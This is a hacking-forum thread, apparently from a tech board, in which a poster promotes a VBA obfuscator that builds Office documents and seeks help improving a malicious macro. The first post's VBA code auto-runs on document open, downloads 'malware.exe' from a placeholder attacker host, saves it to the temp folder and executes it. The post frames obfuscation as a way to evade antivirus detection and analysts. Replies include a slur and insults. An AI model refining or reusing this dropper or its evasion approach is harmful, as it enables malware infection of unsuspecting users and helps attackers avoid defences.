User Controls

VBA Obfuscator/Encrypter + MS Office doc generator and questions regarding VB Script

  1. #1
    Sophie Pedophile Tech Support
    A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;
    • Encrypt all strings present in your VBA code
    • Encrypt data from your python Script in VBA code (domain names or paths for example)
    • Randomize each functions' (or variables) names
    • Choose Encryption method, how and where encryption keys are stored
    • Generate as many unique MS Office documents as you want using a file name list and a document template
    • Enable autodestruction of encryption Keys feature once the VBA has been triggered once

    As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:


    Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
    [rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string


    Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.




    Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

    Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.

    https://github.com/CloudStrief/xcode...doc/skript.txt


    Option Explicit

    Public CN As String
    Public APD As String
    Public UN As String
    Public HOSTNAME As String
    Public DROPPER_EXE As String
    Public PAYLOADS_FOLDER As String
    Public PAYLOAD_FILE As String

    Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
    End Function


    Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String

    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")

    oShell.Run APD + DROPPER_EXE
    FN = APD

    On Error GoTo 0
    End Sub

    Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
    End Sub

    Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE

    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"

    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
    End Function



    This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.

    https://github.com/CloudStrief/xcode
  2. #2
    SBTlauien African Astronaut
    Holy shit, I remember learning Visual Basic way back in high school, in the late 90's. QBASIC, then Visual Basic. I loved it, but don't remember much about the syntax.
  3. #3
    Industrial Houston
    haha, nice try, but you probably infect the text wit h some virus and if i copy it i will be infected, nice try, l0ser
  4. #4
    Sophie Pedophile Tech Support
    haha, nice try, but you probably infect the text wit h some virus and if i copy it i will be infected, nice try, l0ser

    I know you're bullshitting me but your troll isn't even realistic.

    1. What text and why on earth would you need to copy it.
    2. If you're referring to the code, source code doesn't just spring to life on it's own
    3. If you were able to read source code you'd know exactly what would happen if you run this code.

    Now i don't even Visual Basic but i do know python, as such i can tell what the VB code is meant to do broadly speaking. It's meant to contact a server, drop an executable and run it. Now the trick is that the python program i linked to embeds the VB code into a MS Office document as a macro.

    Finally, my default assumption is that everyone here, as in, at least the T&T regulars are better programmers than me. As such i wouldn't presume to be able to trick anyone by posting source code alone. But then again, the only kind of programming you do is graphics related isn't that right? That's objectively the most useless form of programming ever. Graphics related programming is like the liberal arts studies of computer science.
  5. #5
    Sophie Pedophile Tech Support
    Bump for VBA improvement pl0x.
Jump to Top